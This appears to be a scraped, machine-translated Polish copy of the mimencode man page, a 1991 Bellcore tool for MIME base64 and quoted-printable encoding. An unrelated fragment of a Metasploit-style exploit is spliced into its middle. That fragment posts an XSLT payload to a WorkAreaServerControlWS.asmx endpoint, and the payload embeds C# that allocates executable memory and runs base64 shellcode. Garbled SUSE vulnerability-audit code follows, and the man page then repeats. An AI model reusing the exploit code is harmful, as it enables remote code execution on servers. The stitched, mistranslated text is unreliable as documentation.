Sekcja: Polecenia użytkownika (1) Zaktualizowano: Zwolnij 1 Indeks mimencode - Przekształć i wyodrębnij z formatu kodowania pocztowego (Ten sam program jest również instalowany jako quotmmencodequot.) Mimencode - u - b - q - p nazwa pliku - o plik wyjściowy OPIS Program mimencode po prostu konwertuje strumień bajtowy na (lub poza) jeden ze standardowych formatów kodowania poczty zdefiniowany przez MIME, proponowany standard dla internetowych formatów wiadomości multimedialnych. Takie kodowanie jest konieczne, ponieważ dane binarne nie mogą być przesyłane pocztą. Kodowania rozumiane przez mimencode są lepsze niż użycie programów uuencodeuudecode, do wykorzystania w poczcie, pod kilkoma względami, które były ważne dla autorów MIME. Domyślnie mimencode czyta standardowe wejście i wysyła do standardowego wyjścia dziesiętną 64-krotną wersję wejścia. Opcja (naprawdę niepotrzebna) quot-bquot mówi mimencode, aby użył kodowania quotbase64quot. Opcja quot-qquot informuje mimencode, aby używał kodowania quotquoted-printablequot zamiast base64. Opcja quot-uquot mówi mimencode, aby dekodować standardowe wejście, a nie je kodować. Opcja quot-pquot nakazuje mimencode tłumaczyć dekodowane sekwencje CRLF do lokalnej konwencji nowej linii podczas dekodowania i wykonać odwrotność podczas kodowania. Ta opcja ma znaczenie tylko wtedy, gdy działa - b (kodowanie base64). Jeśli podano argument nazwy pliku, dane wejściowe są odczytywane z tego pliku, a nie ze standardowego wejścia. Opcja quot-oquot, po której musi następować nazwa pliku, wysyła dane wyjściowe do określonego pliku, zamiast do standardowego wyjścia. Mimencode ma być zamiennikiem uuencode na pocztę i wykorzystanie wiadomości. Powód jest prosty: uuencode nie działa bardzo dobrze w wielu okolicznościach i sposobach. W szczególności uuencode używa znaków, które nie tłumaczą się dobrze we wszystkich bramach poczty (w szczególności ASCII lt-gt EBCDIC). Ponadto, uuencode nie jest standardem - istnieje kilka wariantów, które kręcą się wokół, kodują i dekodują rzeczy na różne i niekompatybilne sposoby, bez żadnej normy, na której można oprzeć implementację. Wreszcie, uuencode generalnie nie działa dobrze w potoku, chociaż niektóre warianty zostały zmodyfikowane, aby to zrobić. Mimencode implementuje kodowania zdefiniowane dla MIME jako zamienniki uuencode i powinno być znacznie bardziej odporne na wykorzystanie poczty elektronicznej. Ten program został pierwotnie rozprowadzony jako quotmmencodequot. Ta nazwa okazuje się konflikt z programem o tym samym nazwie, które jest częścią oprogramowania Slate firmy BBN, ale całkowite zastąpienie nazwy na mimencode spowodowałoby inne problemy (zwłaszcza z przenośnością systemów, w których lewa połowa nazw plików jest ograniczona do 8 znaków). Obecnie jest dystrybuowana z linkami pod nazwami BOTH. Programy w dystrybucji, które wywołują program, nazywają je "quotimimencodequot", dzięki czemu wersja quotmmencodequot może zostać usunięta w witrynach, w których powoduje problem. (Pliki źródłowe są wciąż nazywane quotmmencodequot, a nie quotmimencodequot.) Copyright (c) 1991 Bell Communications Research, Inc. (Bellcore) Zezwala się na używanie, kopiowanie, modyfikowanie i rozpowszechnianie tego materiału w dowolnym celu i bez honorarium, pod warunkiem że że powyższe informacje o prawach autorskich i niniejsze powiadomienie o pozwoleniach są zawarte we wszystkich egzemplarzach i że nazwa Bellcore nie jest używana w reklamie lub reklamie związanej z tym materiałem bez wyraźnej, pisemnej zgody autoryzowanego przedstawiciela Bellcore. BELLCORE NIE SKŁADA ŻADNYCH OŚWIADCZEŃ DOTYCZĄCYCH DOKŁADNOŚCI LUB PRZYDATNOŚCI TEGO MATERIAŁU W JAKIMKOLWIEK CELU. JEST TO DOSTARCZONE W PRZYPADKU SPRZEDAŻY, BEZ JAKICHKOLWIEK WYRAŹNYCH LUB DOROZUMIANYCH GWARANCJI. Nathaniel S. BorensteinError nreturn Exploit :: CheckCode :: Vulnerable nend nurenurn Exploit :: CheckCode :: Safe nend n ndef uripath nuripath celuri. path nuripath ltlt quotquot jeśli uripath-1, 1 quotquot nurintath nend n nefef buildreferer nif datastorex27SSLx27 nschema quotquot nelse nschema quotquot nendn nreferer schema nreferer ltlt rhod nreferer ltlt quot: quot nreferer ltlt uripath nreferer nend n ndef exploit n nprintstatus (quotGenerowanie EXE Payload i XSLT. quot) nfingerprint randtextalpha (5 rand (5)) n nxsltdata ltlt-XSLT n nprivate statyczny UInt32 MEMCOMMIT 0x1000 nprivate statyczny UInt32 PAGEEXECUTEREADWRITE 0x40 n nSystem. Runtime. InteropServices. DllImport (quotkernel32quot) nprivate static extern UInt32 VirtualAlloc (UInt32 lpStartAddr, UInt32, UInt32 flAllocationType, UInt32 flProtect) n nSystem. Runtime. InteropServices. DllImport (quotkernel32quot) nprivate static extern IntPtr CreateThread (UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, Int Ptr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId) n np. String xml () n nbyte shellcode System. Convert. FromBase64String (shellcode64) nUInt32 funcAddr VirtualAlloc (0, (UInt32) shellcode. Length, MEMCOMMIT, PAGEEXECUTEREADWRITE) nSystem. Runtime. InteropServices. Marshal. Copy (kod powłoki. 0, (IntPtr) (funcAddr), shellcode. Length) nIntPtr hThread IntPtr. Zero nIntPtr pinfo IntPtr. Zero nUInt32 threadId 0 nhThread CreateThread (0, 0, funcAddr, pinfo, 0, ref threadId) nreturn quot quot nn nXSLT n nprintstatus ( quotSpozytywanie, aby uruchomić transformację xslt. quot) nres sendrequestcgi (n WorkAreaServerControlWS. asmxquot, nx27versionx27 gt x271.1x27, nx27methodx27 gt x27POSTx27, nx27ctypex27 gt quottextxml charsetUTF-8quot, nx27headersx27 gt, nx27datax27 gt xsltdata n) nif res i res. code 200 i res. body quot (SLEDSLES) quot) audyt (AUDITOSNOT, quotSUSEquot) nosver eregmatch (wzór: quot (SLE (SD) d) quot, string: release) audyt nif (isnull (osver)) (AUDITUNKNOWNAPPVER, quotSUSEquot) nosver osver1nif ( ereg (wzorzec: quot (SLES11) quot, string: osver)) audit (AUDITOSNOT, quotSUSE SLES 11quot, quotSUSE quot osver) nnif (getkbitem (quotHostSuSErpm-listquot)) audit (AUDITPACKAGELISTMISSING) nncpu getkbitem (quotHostcpuquot) nif (isnull (cpu) ) audyt (AUDITUNKNOWNARCH) nif (cpu quot (SLEDSLES) quot) aud it (AUDITOSNOT, quotSUSEquot) nosver eregmatch (wzór: quot (SLE (SD) d) quot, string: release) audyt nif (isnull (osver)) (AUDITUNKNOWNAPPVER, quotSUSEquot) nosver osver1nif (ereg (wzór: quot (SLES12) quot , string: osver)) audit (AUDITOSNOT, quotSUSE SLES12quot, quotSUSE quot osver) nnif (getkbitem (quotHostSuSErpm-listquot)) audyt (AUDITPACKAGELISTMISSING) nncpu getkbitem (quotHostcpuquot) nif (isnull (cpu)) audyt (AUDITUNKNOWNARCH) nif (cpu ( Ten sam program jest również instalowany jako quotmmencodequot.) Mimencode - u - b - q - p nazwa - o plik wyjściowy OPIS Program mimencode po prostu konwertuje strumień bajtowy do (lub poza) jednego ze standardowych formatów kodowania poczty zdefiniowanych przez MIME, standard dla internetowych formatów wiadomości multimedialnych. Takie kodowanie jest konieczne, ponieważ dane binarne nie mogą być przesyłane pocztą. Kodowania rozumiane przez mimencode są lepsze niż użycie programów uuencodeuudecode, do wykorzystania w poczcie, pod kilkoma względami, które były ważne dla autorów MIME. Domyślnie mimencode czyta standardowe wejście i wysyła do standardowego wyjścia dziesiętną 64-krotną wersję wejścia. Opcja (naprawdę niepotrzebna) quot-bquot mówi mimencode, aby użył kodowania quotbase64quot. Opcja quot-qquot informuje mimencode, aby używał kodowania quotquoted-printablequot zamiast base64. Opcja quot-uquot mówi mimencode, aby dekodować standardowe wejście, a nie je kodować. Opcja quot-pquot nakazuje mimencode tłumaczyć dekodowane sekwencje CRLF do lokalnej konwencji nowej linii podczas dekodowania i wykonać odwrotność podczas kodowania. Ta opcja ma znaczenie tylko wtedy, gdy działa - b (kodowanie base64). Jeśli podano argument nazwy pliku, dane wejściowe są odczytywane z tego pliku, a nie ze standardowego wejścia. Opcja quot-oquot, po której musi następować nazwa pliku, wysyła dane wyjściowe do określonego pliku, zamiast do standardowego wyjścia. Mimencode ma być zamiennikiem uuencode na pocztę i wykorzystanie wiadomości. Powód jest prosty: uuencode doesnrsquot działa bardzo dobrze w wielu okolicznościach i sposobach. W szczególności uuencode używa znaków, które dobrze tłumaczą we wszystkich bramach pocztowych (w szczególności ASCII lt-gt EBCDIC). Ponadto, uuencode nie jest standardem - istnieje kilka wariantów, które kręcą się wokół, kodują i dekodują rzeczy na różne i niekompatybilne sposoby, bez żadnej normy, na której można oprzeć implementację. Wreszcie, uuencode generalnie nie działa dobrze w potoku, chociaż niektóre warianty zostały zmodyfikowane, aby to zrobić. Mimencode implementuje kodowania zdefiniowane dla MIME jako zamienniki uuencode i powinno być znacznie bardziej odporne na wykorzystanie poczty elektronicznej. Ten program został pierwotnie rozprowadzony jako quotmmencodequot. Ta nazwa okazuje się konflikt z programem o tym samym nazwie, które jest częścią oprogramowania Slate firmy BBN, ale całkowite zastąpienie nazwy na mimencode spowodowałoby inne problemy (zwłaszcza z przenośnością systemów, w których lewa połowa nazw plików jest ograniczona do 8 znaków). Obecnie jest dystrybuowana z linkami pod nazwami BOTH. Programy w dystrybucji, które wywołują program, nazywają je "quotimimencodequot", dzięki czemu wersja quotmmencodequot może zostać usunięta w witrynach, w których powoduje problem. (Pliki źródłowe są wciąż nazywane quotmmencodequot, a nie quotmimencodequot.) Copyright (c) 1991 Bell Communications Research, Inc. (Bellcore) Zezwala się na używanie, kopiowanie, modyfikowanie i rozpowszechnianie tego materiału w dowolnym celu i bez honorarium, pod warunkiem że że powyższe informacje o prawach autorskich i niniejsze powiadomienie o pozwoleniach są zawarte we wszystkich egzemplarzach i że nazwa Bellcore nie jest używana w reklamie lub reklamie związanej z tym materiałem bez wyraźnej, pisemnej zgody autoryzowanego przedstawiciela Bellcore. BELLCORE NIE SKŁADA ŻADNYCH OŚWIADCZEŃ DOTYCZĄCYCH DOKŁADNOŚCI LUB PRZYDATNOŚCI TEGO MATERIAŁU W JAKIMKOLWIEK CELU. JEST TO DOSTARCZONE W PRZYPADKU SPRZEDAŻY, BEZ JAKICHKOLWIEK WYRAŹNYCH LUB DOROZUMIANYCH GWARANCJI. Nathaniel S. Borenstein
No comments:
Post a Comment